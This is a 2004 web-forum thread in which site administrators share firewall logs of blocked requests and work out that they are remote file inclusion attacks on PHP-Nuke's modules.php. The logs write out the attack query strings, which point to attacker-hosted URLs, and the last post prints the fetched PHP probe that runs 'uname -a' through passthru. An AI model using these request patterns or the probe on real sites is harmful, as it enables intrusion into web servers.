Three Hack Attempts Blocked - Can someone explain?

Worker Joined: Aug 06, 2004 Posts: 192

Could someone explain to me what this is and why its blocked. Was someone trying to hack my site or is it something else?

Code:

Date & Time: 2004-09-23 03:28:06


Blocked IP: 81.23.227.170


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: curl/7.9.8 (i686-suse-linux) libcurl 7.9.8 (OpenSSL 0.9.6g) (ipv6 enabled) Query String: www.*********.net/modules.php?name=http://81.23.227.170/yi7oxij?&file=http://81.23.227.170/yi7oxij?&p=http://81.23.227.170/yi7oxij?


Forwarded For: none


Client IP: none


Remote Address: 81.23.227.170


Remote Port: 11788


Request Method: GET

Code:

Date & Time: 2004-09-22 13:21:39


Blocked IP: 66.89.120.35


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled) Query String: www.*********.net/modules.php?name=http://66.89.120.35/ebekpko?&file=http://66.89.120.35/ebekpko?&p=http://66.89.120.35/ebekpko?


Forwarded For: none


Client IP: none


Remote Address: 66.89.120.35


Remote Port: 42197


Request Method: GET

Code:

Date & Time: 2004-09-22 17:46:01


Blocked IP: 65.39.172.139


User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


User Agent: curl/7.9.8 (i686-pc-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.6b) (ipv6 enabled) Query String: www.*********.net/modules.php?name=http://65.39.172.139/tuy3fga?&file=http://65.39.172.139/tuy3fga?&p=http://65.39.172.139/tuy3fga?


Forwarded For: none


Client IP: none


Remote Address: 65.39.172.139


Remote Port: 36047


Request Method: GET

Site Admin Joined: Jun 04, 2004 Posts: 6437

Only registered users can see links on this board! Get registered or login! is the same thing, and might answer your question.

Posted: Thu Sep 23, 2004 6:07 pm

Sorry, I just realized that its the same thing. That kind of explains it. Thanks.

Posted: Thu Sep 23, 2004 6:12 pm

No problem. I was confused, too. Looks like a script kiddie that managed to successfully attack a lot of sites, but didn't gain much from it.

Posted: Thu Sep 23, 2004 8:37 pm

Too bad I wasn't using the PC Killer Template. Very Happy

Posted: Thu Sep 23, 2004 8:45 pm

Unfortunately, it wouldn't have worked in this case as the attack was coming from another web server, not the script kiddie's PC.

registered · Posted: Thu Sep 23, 2004 10:53 pm

I just blocked someone doing this on my site as well.

Quote:

User Agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
Query String: www.mysite.com/modules.php?name=http://193.150.170.160/4do4sjr?&l_op=http://193.150.170.160/4do4sjr?&lid=http://193.150.170.160/4do4sjr?&title2=http://193.150.170.160/4do4sjr?
Forwarded For: none
Client IP: none
Remote Address: 193.150.170.160
Remote Port: 4885
Request Method: GET

Posted: Fri Sep 24, 2004 4:43 am

They were banging on me last night too....IF you follow the address here is what you get...

<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>